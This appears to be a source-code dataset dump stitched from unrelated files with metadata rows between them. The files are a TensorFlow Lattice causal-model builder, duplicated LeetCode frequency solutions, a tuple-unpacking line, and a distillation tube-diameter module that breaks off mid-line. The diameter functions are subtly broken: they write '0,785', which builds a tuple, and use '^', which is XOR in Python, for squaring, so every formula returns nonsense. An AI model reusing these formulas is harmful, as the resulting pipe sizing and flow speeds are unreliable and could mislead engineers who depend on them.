if params.uy_layer == 'linear':
layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
else:
layer_uy = uy_calibrator
lattice_y = tfl.layers.Lattice(
lattice_sizes=lattice_sizes,
units=params.lattice_units,
monotonicities=[
'increasing', params.uy_monotonicity, *params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='Y',
)([a_calibrator, layer_uy, *layer_z])
lattice_y_prime = tfl.layers.Lattice(
lattice_sizes=lattice_sizes,
units=params.lattice_units,
monotonicities=[
'increasing', params.uy_monotonicity, *params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='Y_prime',
)([a_prime_calibrator, layer_uy, *layer_z])
lattice_A_prime = tfl.layers.Lattice(
lattice_sizes=lattice_sizes[2:],
units=params.lattice_units,
monotonicities=[
*params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='A_out_prime',
)([*layer_z])
lattice_A = tfl.layers.Lattice(
lattice_sizes=lattice_sizes[2:],
units=params.lattice_units,
monotonicities=[
*params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='A_out',
)([*layer_z])
if params.end_activation == 'calib':
lattice_y = tfl.layers.PWLCalibration(
input_keypoints=np.linspace(0.0, 1.0, 5),
name='output_calib',
)(
lattice_y)
elif params.end_activation == 'softmax':
lattice_y = tf.keras.layers.Softmax()(lattice_y)
elif params.end_activation == 'sigmoid':
lattice_y = tf.nn.sigmoid(lattice_y)
lattice_y_prime = tf.nn.sigmoid(lattice_y_prime)
model = tf.keras.models.Model(
inputs=model_inputs,
outputs=[lattice_y, lattice_y_prime, lattice_A, lattice_A_prime])
return model
def Twin_Net_Kenyan_with_Z_A(treatment, uy, confounders, params):
lattice_sizes = params.lattice_sizes
model_inputs = []
a_input = tf.keras.layers.Input(shape=[1], name='A')
model_inputs.append(a_input)
a_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units, monotonicity='increasing',
name='a_calib')(a_input)
a_prime_input = tf.keras.layers.Input(shape=[1], name='A_prime')
model_inputs.append(a_prime_input)
a_prime_calibrator = make_calibrators(treatment.values, lattice_sizes[0], params.calib_units,
monotonicity='increasing',
name='a_prime_calib')(a_prime_input)
uy_input = tf.keras.layers.Input(shape=[1], name='Uy')
model_inputs.append(uy_input)
uy_calibrator = make_calibrators(uy, lattice_sizes[1], params.hidden_dims, monotonicity=params.uy_monotonicity
, name='uy_name')(uy_input)
if params.multiple_confounders:
inputs_, z_calibrator = make_multiple_calibrators(confounders, params)
_ = [model_inputs.append(i) for i in inputs_]
layer_z = z_calibrator
else:
confounders = confounders.values
z_input = tf.keras.layers.Input(shape=(params.len_conf,), name='Z')
model_inputs.append(z_input)
z_calibrator = make_calibrators(confounders, lattice_sizes[2], params.z_calib_units,
monotonicity=params.z_monotonicity[0])(z_input)
z_calibrator = [z_calibrator]
# Z layer
if params.z_layer == 'linear':
z_calibrator = tf.tile(z_calibrator[..., tf.newaxis], (1, 1, params.z_calib_units))
layer_z = tfl.layers.Linear(params.z_calib_units, units=params.z_calib_units,
)(z_calibrator)
layer_z = [layer_z]
else:
layer_z = z_calibrator
# Uy layer
if params.uy_layer == 'linear':
layer_uy = tfl.layers.Linear(1, units=params.calib_units, monotonicities=params.uy_monotonicity)(uy_calibrator)
else:
layer_uy = uy_calibrator
conc_a_z = tf.keras.layers.Concatenate()([a_calibrator, *layer_z])
conc_a_prime_z = tf.keras.layers.Concatenate()([a_prime_calibrator, *layer_z])
layer_a_z = tfl.layers.Linear( np.sum([i.shape[-1] for i in layer_z]) +lattice_sizes[0], units=1, monotonicities='increasing')(conc_a_z)
layer_a_z_prime = tfl.layers.Linear(np.sum([i.shape[-1] for i in layer_z]) +lattice_sizes[0], units=1, monotonicities='increasing')(conc_a_prime_z)
if params.concats:
conc_input = tf.keras.layers.Concatenate(axis=1)([layer_a_z, layer_uy, *layer_z])
conc_input_prime = tf.keras.layers.Concatenate(axis=1)([layer_a_z_prime, layer_uy, *layer_z])
lattice_y = tfl.layers.Linear(
np.sum([i.shape[-1] for i in layer_z]) + lattice_sizes[1]+1,
units=params.lattice_units,
monotonicities=
'increasing'
,
name='Y',
)(conc_input)
lattice_y_prime = tfl.layers.Linear(
np.sum([i.shape[-1] for i in layer_z])+ lattice_sizes[1] + 1,
units=params.lattice_units,
monotonicities=
'increasing'
,
name='Y_prime',
)(conc_input_prime)
else:
lattice_y = tfl.layers.Lattice(
lattice_sizes=[2,*lattice_sizes[1:]],
units=params.lattice_units,
monotonicities=[
'increasing', params.uy_monotonicity, *params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='Y',
)([layer_a_z, layer_uy, *layer_z])
lattice_y_prime = tfl.layers.Lattice(
lattice_sizes=[2,*lattice_sizes[1:]],
units=params.lattice_units,
monotonicities=[
'increasing', params.uy_monotonicity, *params.z_monotonicity
],
output_min=0.0,
output_max=1.0,
name='Y_prime',
)([layer_a_z_prime, layer_uy, *layer_z])
if params.end_activation == 'calib':
lattice_y = tfl.layers.PWLCalibration(
input_keypoints=np.linspace(0.0, 1.0, 5),
name='output_calib',
)(
lattice_y)
elif params.end_activation == 'softmax':
lattice_y = tf.keras.layers.Softmax()(lattice_y)
elif params.end_activation == 'sigmoid':
lattice_y = tf.nn.sigmoid(lattice_y)
lattice_y_prime = tf.nn.sigmoid(lattice_y_prime)
model = tf.keras.models.Model(
inputs=model_inputs,
outputs=[lattice_y, lattice_y_prime])
return model
| 40.025501
| 151
| 0.611313
| 2,627
| 21,974
| 4.802817
| 0.054054
| 0.054213
| 0.034002
| 0.035666
| 0.837442
| 0.807086
| 0.786399
| 0.765871
| 0.750733
| 0.732662
| 0
| 0.011691
| 0.28379
| 21,974
| 548
| 152
| 40.09854
| 0.789999
| 0.015928
| 0
| 0.742794
| 0
| 0
| 0.049142
| 0.003332
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015521
| false
| 0
| 0.008869
| 0
| 0.039911
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6bb55cc1a7921e00babc4d3cd09f92cf686695df
| 2,874
|
py
|
Python
|
Python3/1224.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 854
|
2018-11-09T08:06:16.000Z
|
2022-03-31T06:05:53.000Z
|
Python3/1224.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 29
|
2019-06-02T05:02:25.000Z
|
2021-11-15T04:09:37.000Z
|
Python3/1224.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 347
|
2018-12-23T01:57:37.000Z
|
2022-03-12T14:51:21.000Z
|
__________________________________________________________________________________________________
sample 428 ms submission
# not my submission
class Solution:
def maxEqualFreq(self, nums: List[int]) -> int:
from collections import Counter
counter = Counter(nums)
count2ref = Counter()
for v, c in counter.items():
count2ref[c] += 1
i = len(nums) - 1
def dec_count(count):
count2ref[count] -= 1
if count2ref[count] == 0:
count2ref.pop(count)
while i > 0:
if len(count2ref.keys()) == 2:
keys2values = list(count2ref.items())
keys2values.sort()
if keys2values[1][0] - keys2values[0][0] == 1 and keys2values[1][1] == 1: return i + 1
elif keys2values[0][0] == 1 and keys2values[0][1] == 1: return i + 1
elif len(count2ref.keys()) == 1:
keys2values = list(count2ref.items())
if keys2values[0][1] > 1 and keys2values[0][0] == 1: return i + 1
elif keys2values[0][0] > 1 and keys2values[0][1] == 1: return i + 1
counter[nums[i]] -= 1
if counter[nums[i]] == 0:
counter.pop(nums[i])
dec_count(1)
else:
dec_count(counter[nums[i]] + 1)
count2ref[counter[nums[i]]] += 1
i -= 1
return 2
__________________________________________________________________________________________________
sample 452 ms submission
class Solution:
def maxEqualFreq(self, nums: List[int]) -> int:
from collections import Counter
counter = Counter(nums)
count2ref = Counter()
for v, c in counter.items():
count2ref[c] += 1
i = len(nums) - 1
def dec_count(count):
count2ref[count] -= 1
if count2ref[count] == 0:
count2ref.pop(count)
while i > 0:
if len(count2ref.keys()) == 2:
keys2values = list(count2ref.items())
keys2values.sort()
if keys2values[1][0] - keys2values[0][0] == 1 and keys2values[1][1] == 1:
return i + 1
elif keys2values[0][0] == 1 and keys2values[0][1] == 1:
return i + 1
elif len(count2ref.keys()) == 1:
keys2values = list(count2ref.items())
if keys2values[0][1] > 1 and keys2values[0][0] == 1:
return i + 1 # example: [1,2,3,4,5]
elif keys2values[0][0] > 1 and keys2values[0][1] == 1:
return i + 1 # example: [1,1,1,1,1]
counter[nums[i]] -= 1
if counter[nums[i]] == 0:
counter.pop(nums[i])
dec_count(1)
else:
dec_count(counter[nums[i]] + 1)
count2ref[counter[nums[i]]] += 1
i -= 1
return 2
__________________________________________________________________________________________________
| 35.04878
| 102
| 0.564718
| 333
| 2,874
| 3.972973
| 0.138138
| 0.024187
| 0.078609
| 0.084656
| 0.966742
| 0.966742
| 0.954649
| 0.954649
| 0.954649
| 0.954649
| 0
| 0.074447
| 0.308281
| 2,874
| 81
| 103
| 35.481481
| 0.591046
| 0.020529
| 0
| 0.859155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.028169
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6bd461c56b668270c1602a79e60ce5abdbcbdee8
| 67
|
py
|
Python
|
examples/unpack_ex.py
|
igfish/toyvm
|
bb1ab371a8c71ba01522556235fc9f017c9b6b8f
|
[
"MIT"
] | null | null | null |
examples/unpack_ex.py
|
igfish/toyvm
|
bb1ab371a8c71ba01522556235fc9f017c9b6b8f
|
[
"MIT"
] | null | null | null |
examples/unpack_ex.py
|
igfish/toyvm
|
bb1ab371a8c71ba01522556235fc9f017c9b6b8f
|
[
"MIT"
] | null | null | null |
a, b, c, *d, e, f = 1, 2, 3, 4, 5, 6, 7, 8
print(a, b, c, d, e, f)
| 22.333333
| 42
| 0.373134
| 21
| 67
| 1.190476
| 0.714286
| 0.16
| 0.24
| 0.32
| 0.48
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 0.313433
| 67
| 2
| 43
| 33.5
| 0.369565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
d418dbac179023727f5b84c1880156bd5544b034
| 25,776
|
py
|
Python
|
src/rectification/equations/Diameters_tubes.py
|
alex-s-v/pact-rectification
|
0d9ff499ce78489aa6a213936d5097130341a781
|
[
"MIT"
] | 1
|
2020-01-30T21:19:51.000Z
|
2020-01-30T21:19:51.000Z
|
src/rectification/equations/Diameters_tubes.py
|
alex-s-v/pact-rectification
|
0d9ff499ce78489aa6a213936d5097130341a781
|
[
"MIT"
] | null | null | null |
src/rectification/equations/Diameters_tubes.py
|
alex-s-v/pact-rectification
|
0d9ff499ce78489aa6a213936d5097130341a781
|
[
"MIT"
] | 1
|
2020-01-21T20:26:56.000Z
|
2020-01-21T20:26:56.000Z
|
from rectification.utils import unitcheck
@unitcheck(F_mass="kg/s", rho_F_20="kg/m**3", w_liq="m/s", res_unit="m")
def d_enter_feed(F_mass, rho_F_20, w_liq):
"""
Calculates the tube's diameter of enter to the heat exchanger of Feed.
Parameters
----------
F_mass : float
The mass flow rate of feed [kg/s]
rho_F_20 : float
The density of feed at 20 degrees, [kg/m**3]
w_liq :float
The speed of liquid at the tube, [m/s]
Returns
-------
d_enter_feed : float
The tube's diameter of enter to the heat exchanger of Feed, [m]
References
----------
&&&
"""
return F_mass/(0,785*rho_F_20*w_liq)
@unitcheck(F_mass="kg/s", rho_F_20="kg/m**3", d_enter_feed_real="m", res_unit="m/s")
def w_liq_real_enter_feed(F_mass, d_enter_feed_real, rho_F_20):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
F_mass : float
The mass flow rate of feed [kg/s]
rho_F_20 : float
The density of feed at 20 degrees, [kg/m**3]
d_enter_feed_real : float
The real tube's diameter, [m]
Returns
-------
w_liq_real_enter_feed : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return F_mass/((d_enter_feed_real^2)*rho_F_20*0,785)
@unitcheck(F_mass="kg/s", rho_F_tboil="kg/m**3", w_liq="m/s", res_unit="m")
def d_enter_feed_column(F_mass, rho_F_tboil, w_liq):
"""
Calculates the tube's diameter of enter to the column at the feed plate.
Parameters
----------
F_mass : float
The mass flow rate of feed [kg/s]
rho_F_tboil : float
The density of feed at the temperature of feed boiling , [kg/m**3]
w_liq :float
The speed of liquid at the tube, [m/s]
Returns
-------
d_enter_feed_column : float
The tube's diameter of enter to the column at the feed plate, [m]
References
----------
&&&&
"""
return F_mass/(0,785*rho_F_tboil*w_liq)
@unitcheck(F_mass="kg/s", rho_F_tboil="kg/m**3", d_enter_feed_column_real="m", res_unit="m/s")
def w_liq_real_feed_column(F_mass, d_enter_feed_column_real, rho_F_tboil):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
F_mass : float
The mass flow rate of feed [kg/s]
rho_F_tboil : float
The density of feed at the temperature of feed boiling , [kg/m**3]
d_enter_feed_column_real : float
The real tube's diameter, [m]
Returns
-------
w_liq_real_enter_feed_column : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return F_mass/((d_enter_feed_column_real^2)*rho_F_tboil*0,785)
@unitcheck(G_mass="kg/s", rho_P_vapor="kg/m**3", w_vapor="m/s", res_unit="m")
def d_out_dist(G_mass, rho_P_vapor, w_vapor):
"""
Calculates the tube's diameter of out vapor distilliat from column to dephlegmator.
Parameters
----------
G_mass : float
The mass flow rate of vapor, [kg/s]
rho_P_vapor : float
The density of distilliat vapor at boilling temperature, [kg/m**3]
w_vapor :float
The speed of vapor at the tube, [m/s]
Returns
-------
d_out_dist : float
The tube's diameter of enter to the heat exchanger of Feed, [m]
References
----------
&&&
"""
return G_mass/(0,785*rho_P_vapor*w_vapor)
@unitcheck(G_mass="kg/s", rho_P_vapor="kg/m**3", d_out_dist_real="m", res_unit="m/s")
def w_vapor_real_out_dist(G_mass, d_out_dist_real, rho_P_vapor):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
G_mass : float
The mass flow rate of vapor, [kg/s]
rho_P_vapor : float
The density of feed at 20 degrees, [kg/m**3]
d_out_dist_real : float
The real tube's diameter, [m]
Returns
-------
w_vapor_real_out_dist : float
The real speed of vapor at the tube, [m/s]
References
----------
&&&
"""
return G_mass/((d_out_dist_real^2)*rho_P_vapor*0,785)
@unitcheck(Reflux_mass="kg/s", rho_P_liq="kg/m**3", w_liq="m/s", res_unit="m")
def d_enter_reflux(Reflux_mass, rho_P_liq, w_liq):
"""
Calculates the tube's diameter of out vapor distilliat from column to dephlegmator.
Parameters
----------
Reflux_mass : float
The mass flow rate of reflux, [kg/s]
rho_P_liq : float
The density of distilliat liquid at boilling temperature, [kg/m**3]
w_liq :float
The speed of liquid at the tube, [m/s]
Returns
-------
d_enter_reflux : float
The tube's diameter of out vapor distilliat from column to dephlegmator, [m]
References
----------
&&&
"""
return Reflux_mass/(0,785*rho_P_liq*w_liq)
@unitcheck(Reflux_mass="kg/s", rrho_P_liq="kg/m**3", d_enter_reflux_real="m", res_unit="m/s")
def w_enter_reflux_real(Reflux_mass, rho_P_liq, d_enter_reflux_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
Reflux_mass : float
The mass flow rate of reflux, [kg/s]
rho_P_liq : float
The density of distilliat liquid at boilling temperature, [kg/m**3]
d_enter_reflux_real : float
The real tube's diameter, [m]
Returns
-------
w_enter_reflux_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return Reflux_mass/((d_enter_reflux_real^2)*rho_P_liq*0,785)
@unitcheck(W_mass="kg/s", rho_W_liq="kg/m**3", w_liq_drift="m/s", res_unit="m")
def d_enter_waste_boiler(W_mass, rho_W_liq, w_liq_drift):
"""
Calculates the tube's diameter of enter waste to boiler from column.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_W_liq : float
The density of waste liquid at boilling temperature, [kg/m**3]
w_liq_drift :float
The drift speed of liquid at the tube, [m/s]
Returns
-------
d_enter_reflux : float
The tube's diameter of enter waste to boiler from column, [m]
References
----------
&&&
"""
return W_mass/(0,785*rho_W_liq*w_liq_drift)
@unitcheck(W_mass="kg/s", rho_W_liq="kg/m**3", d_enter_waste_boiler_real="m", res_unit="m/s")
def w_enter_waste_boiler_real(W_mass, rho_W_liq, d_enter_waste_boiler_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_W_liq : float
The density of waste liquid at boilling temperature, [kg/m**3]
d_enter_waste_boiler_real : float
The real tube's diameter, [m]
Returns
-------
w_enter_waste_boiler_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return W_mass/((d_enter_waste_boiler_real^2)*rho_W_liq*0,785)
@unitcheck(W_mass="kg/s", rho_W_vapor="kg/m**3", w_vapor="m/s", res_unit="m")
def d_out_waste_boiler(W_mass, rho_W_vapor, w_vapor):
"""
Calculates the tube's diameter of out waste to column from boiler.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_W_vapor : float
The density of waste liquid at boilling temperature, [kg/m**3]
w_vapor :float
The speed of vapor at the tube, [m/s]
Returns
-------
d_out_waste_boiler : float
The tube's diameter of out waste to column from boiler, [m]
References
----------
&&&
"""
return W_mass/(0,785*rho_W_vapor*w_vapor)
@unitcheck(W_mass="kg/s", rho_W_vapor="kg/m**3", d_out_waste_boiler_real="m", res_unit="m/s")
def w_out_waste_boiler_real(W_mass, rho_W_vapor, d_out_waste_boiler_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_W_vapor : float
The density of waste vapor at boilling temperature, [kg/m**3]
d_out_waste_boiler_real : float
The real tube's diameter, [m]
Returns
-------
w_out_waste_boiler_real : float
The real speed of vapor at the tube, [m/s]
References
----------
&&&
"""
return W_mass/((d_out_waste_boiler_real^2)*rho_W_vapor*0,785)
@unitcheck(m_steam_boil="kg/s", rho_steam="kg/m**3", w_vapor="m/s", res_unit="m")
def d_enter_steam_boiler(m_steam_boil, rho_steam, w_vapor):
"""
Calculates the tube's diameter of enter steam to boiler.
Parameters
----------
m_steam_boil : float
The mass flow rate of steam, [kg/s]
rho_steam : float
The density of steam at boilling temperature, [kg/m**3]
w_vapor :float
The speed of steam at the tube, [m/s]
Returns
-------
d_enter_steam_boiler : float
The tube's diameter of out waste to column from boiler, [m]
References
----------
&&&
"""
return m_steam_boil/(0,785*rho_steam*w_vapor)
@unitcheck(m_steam_boil="kg/s", rho_steam_vapor="kg/m**3", d_enter_steam_boiler_real="m", res_unit="m/s")
def w_enter_steam_boiler_real(m_steam_boil, rho_steam_vapor, d_enter_steam_boiler_real):
"""
Calculates the real speed of vapor at the tube.
Parameters
----------
m_steam_boil : float
The mass flow rate of steam, [kg/s]
rho_steam_vapor : float
The density of waste vapor at boilling temperature, [kg/m**3]
d_enter_steam_boiler_real : float
The real tube's diameter, [m]
Returns
-------
w_enter_steam_boiler_real : float
The real speed of vapor at the tube, [m/s]
References
----------
&&&
"""
return m_steam_boil/((d_enter_steam_boiler_real^2)*rho_steam_vapor*0,785)
@unitcheck(m_steam_boil="kg/s", rho_water_liq="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_cond_boiler(m_steam_boil, rho_water_liq, w_drift):
"""
Calculates the tube's diameter of out condensat from boiler.
Parameters
----------
m_steam_boil : float
The mass flow rate of steam, [kg/s]
rho_water_liq : float
The density of liquid at boilling temperature, [kg/m**3]
w_drift :float
The speed of steam at the tube, [m/s]
Returns
-------
d_out_cond_boiler : float
The tube's diameter of out waste to column from boiler, [m]
References
----------
&&&
"""
return m_steam_boil/(0,785*rho_water_liq*w_drift)
@unitcheck(m_steam_boil="kg/s", rho_water_liq="kg/m**3", d_out_cond_boiler_real="m", res_unit="m/s")
def w_out_cond_boiler_real(m_steam_boil, rho_water_liq, d_out_cond_boiler_real):
"""
Calculates the real speed of condensat at the tube.
Parameters
----------
m_steam_boil : float
The mass flow rate of steam, [kg/s]
rho_water_liq : float
The density of liquid at boilling temperature, [kg/m**3]
d_out_cond_boiler_real : float
The real tube's diameter, [m]
Returns
-------
w_out_cond_boiler_real : float
The real speed of condensat at the tube, [m/s]
References
----------
&&&
"""
return m_steam_boil/((d_out_cond_boiler_real^2)*rho_water_liq*0,785)
@unitcheck(m_steam_feed="kg/s", rho_steam="kg/m**3", w_vapor="m/s", res_unit="m")
def d_enter_steam_feed(m_steam_feed, rho_steam, w_vapor):
"""
Calculates the tube's diameter of enter steam to feed heat exchanger.
Parameters
----------
m_steam_feed : float
The mass flow rate of steam, [kg/s]
rho_steam : float
The density of steam at boilling temperature, [kg/m**3]
w_vapor :float
The speed of steam at the tube, [m/s]
Returns
-------
d_enter_steam_feed : float
The tube's diameter of enter feed to column from heat exchanger, [m]
References
----------
&&&
"""
return m_steam_feed/(0,785*rho_steam*w_vapor)
@unitcheck(m_steam_feed="kg/s", rho_steam_vapor="kg/m**3", d_enter_steam_feed_real="m", res_unit="m/s")
def w_enter_steam_feed_real(m_steam_feed, rho_steam_vapor, d_enter_steam_feed_real):
"""
Calculates the real speed of vapor at the tube.
Parameters
----------
m_steam_feed : float
The mass flow rate of steam, [kg/s]
rho_steam_vapor : float
The density of waste vapor at boilling temperature, [kg/m**3]
d_enter_steam_feed_real : float
The real tube's diameter, [m]
Returns
-------
w_enter_steam_feed_real : float
The real speed of vapor at the tube, [m/s]
References
----------
&&&
"""
return m_steam_feed/((d_enter_steam_feed_real^2)*rho_steam_vapor*0,785)
@unitcheck(m_steam_feed="kg/s", rho_water_liq="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_cond_feed(m_steam_feed, rho_water_liq, w_drift):
"""
Calculates the tube's diameter of out condensat from heat exchanger.
Parameters
----------
m_steam_feed : float
The mass flow rate of steam, [kg/s]
rho_water_liq : float
The density of liquid at boilling temperature, [kg/m**3]
w_drift :float
The speed of steam at the tube, [m/s]
Returns
-------
d_out_cond_feed : float
The tube's diameter of out waste to column from heat exchanger, [m]
References
----------
&&&
"""
return m_steam_feed/(0,785*rho_water_liq*w_drift)
@unitcheck(m_steam_feed="kg/s", rho_water_liq="kg/m**3", d_out_cond_feed_real="m", res_unit="m/s")
def w_out_cond_feed_real(m_steam_feed, rho_water_liq, d_out_cond_feed_real):
"""
Calculates the real speed of condensat at the tube.
Parameters
----------
m_steam_feed : float
The mass flow rate of steam, [kg/s]
rho_water_liq : float
The density of liquid at boilling temperature, [kg/m**3]
d_out_cond_feed_real : float
The real tube's diameter, [m]
Returns
-------
w_out_cond_feed_real : float
The real speed of condensat at the tube, [m/s]
References
----------
&&&
"""
return m_steam_feed/((d_out_cond_feed_real^2)*rho_water_liq*0,785)
@unitcheck(G_mass="kg/s", rho_dist="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_cond_deph(G_mass, rho_dist, w_drift):
"""
Calculates the tube's diameter of out distilliat from dephlegmator.
Parameters
----------
G_mass : float
The mass flow rate of distilliat, [kg/s]
rho_dist : float
The density of distilliat at boilling temperature, [kg/m**3]
w_drift :float
The speed of steam at the tube, [m/s]
Returns
-------
d_out_cond_deph : float
The tube's diameter of out distilliat from dephlegmator, [m]
References
----------
&&&
"""
return G_mass/(0,785*rho_dist*w_drift)
@unitcheck(G_mass="kg/s", rho_dist="kg/m**3", d_out_deph_real="m", res_unit="m/s")
def w_out_deph_real(G_mass,rho_dist, d_out_deph_real):
"""
Calculates the real speed of condensat at the tube.
Parameters
----------
G_mass : float
The mass flow rate of distilliat, [kg/s]
rho_dist : float
The density of liquid at boilling temperature, [kg/m**3]
d_out_deph_real : float
The real tube's diameter, [m]
Returns
-------
w_out_deph_real : float
The real speed of condensat at the tube, [m/s]
References
----------
&&&
"""
return G_mass/((d_out_deph_real^2)*rho_dist*0,785)
@unitcheck(P_mass="kg/s", rho_dist="kg/m**3", w_drift="m/s", res_unit="m")
def d_enter_dist_cooler(P_mass, rho_dist, w_drift):
"""
Calculates the tube's diameter of enter distilliat to distilliat cooler.
Parameters
----------
P_mass : float
The mass flow rate of distilliat, [kg/s]
rho_dist : float
The density of liquid at boilling temperature, [kg/m**3]
w_drift :float
The speed of steam at the tube, [m/s]
Returns
-------
d_enter_dist_cooler : float
The tube's diameter of enter distilliat to distilliat cooler, [m]
References
----------
&&&
"""
return P_mass/(0,785*rho_dist*w_drift)
@unitcheck(P_mass="kg/s", rho_dist ="kg/m**3", d_enter_dist_cooler_real="m", res_unit="m/s")
def w_enter_dist_cooler_real(P_mass, rho_dist , d_enter_dist_cooler_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
P_mass : float
The mass flow rate of distilliat, [kg/s]
rho_dist : float
The density of distilliat at boilling temperature, [kg/m**3]
d_enter_dist_cooler_real : float
The real tube's diameter, [m]
Returns
-------
w_enter_dist_cooler_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return P_mass/((d_enter_dist_cooler_real^2)*rho_dist *0,785)
@unitcheck(P_mass="kg/s", rho_dist_cool="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_dist_cooler(P_mass, rho_dist_cool, w_drift):
"""
Calculates the tube's diameter of out distilliat from distilliat cooler to distilliat volume.
Parameters
----------
P_mass : float
The mass flow rate of distilliat, [kg/s]
rho_dist_cool : float
The density of liquid at cooling temperature, [kg/m**3]
w_drift :float
The speed of steam at the tube, [m/s]
Returns
-------
d_out_dist_cooler : float
The tube's diameter of out distilliat from distilliat cooler to distilliat volume, [m]
References
----------
&&&
"""
return P_mass/(0,785*rho_dist_cool*w_drift)
@unitcheck(P_mass="kg/s", rho_dist_cool ="kg/m**3", d_out_dist_cooler_real="m", res_unit="m/s")
def w_out_dist_cooler_real(P_mass, rho_dist_cool , d_out_dist_cooler_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
P_mass : float
The mass flow rate of distilliat, [kg/s]
rho_dist_cool : float
The density of distilliat at boilling temperature, [kg/m**3]
d_out_dist_cooler_real : float
The real tube's diameter, [m]
Returns
-------
w_out_dist_cooler_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return P_mass/((d_out_dist_cooler_real^2)*rho_dist_cool *0,785)
@unitcheck(W_mass="kg/s", rho_waste="kg/m**3", w_drift="m/s", res_unit="m")
def d_enter_waste_cooler(W_mass, rho_waste, w_drift):
"""
Calculates the tube's diameter of enter waste to waste cooler.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_waste : float
The density of liquid at boilling temperature, [kg/m**3]
w_drift :float
The speed of steam at the tube, [m/s]
Returns
-------
d_enter_waste_cooler : float
The tube's diameter of enter waste to waste cooler, [m]
References
----------
&&&
"""
return W_mass/(0,785*rho_waste*w_drift)
@unitcheck(W_mass="kg/s", rho_waste ="kg/m**3", d_enter_waste_cooler_real="m", res_unit="m/s")
def w_enter_waste_cooler_real(W_mass, rho_waste , d_enter_waste_cooler_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_waste : float
The density of waste at boilling temperature, [kg/m**3]
d_enter_waste_cooler_real : float
The real tube's diameter, [m]
Returns
-------
w_enter_waste_cooler_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return W_mass/((d_enter_waste_cooler_real^2)*rho_waste *0,785)
@unitcheck(W_mass="kg/s", rho_waste_cool="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_waste_cooler(W_mass, rho_waste_cool, w_drift):
"""
Calculates the tube's diameter of out waste from waste cooler to waste volume.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_waste_cool : float
The density of liquid at cooling temperature, [kg/m**3]
w_drift :float
The speed of steam at the tube, [m/s]
Returns
-------
d_out_waste_cooler : float
The tube's diameter of out waste from waste cooler to waste volume, [m]
References
----------
&&&
"""
return W_mass/(0,785*rho_waste_cool*w_drift)
@unitcheck(W_mass="kg/s", rho_waste_cool ="kg/m**3", d_out_waste_cooler_real="m", res_unit="m/s")
def w_out_waste_cooler_real(W_mass, rho_waste_cool , d_out_waste_cooler_real):
"""
Calculates the real speed of liquid at the tube.
Parameters
----------
W_mass : float
The mass flow rate of waste, [kg/s]
rho_waste_cool : float
The density of waste at boilling temperature, [kg/m**3]
d_out_waste_cooler_real : float
The real tube's diameter, [m]
Returns
-------
w_out_waste_cooler_real : float
The real speed of liquid at the tube, [m/s]
References
----------
&&&
"""
return W_mass/((d_out_waste_cooler_real^2)*rho_waste_cool *0,785)
@unitcheck(m_coolwater_dist="kg/s", rho_dist_coolwater="kg/m**3", w_liq="m/s", res_unit="m")
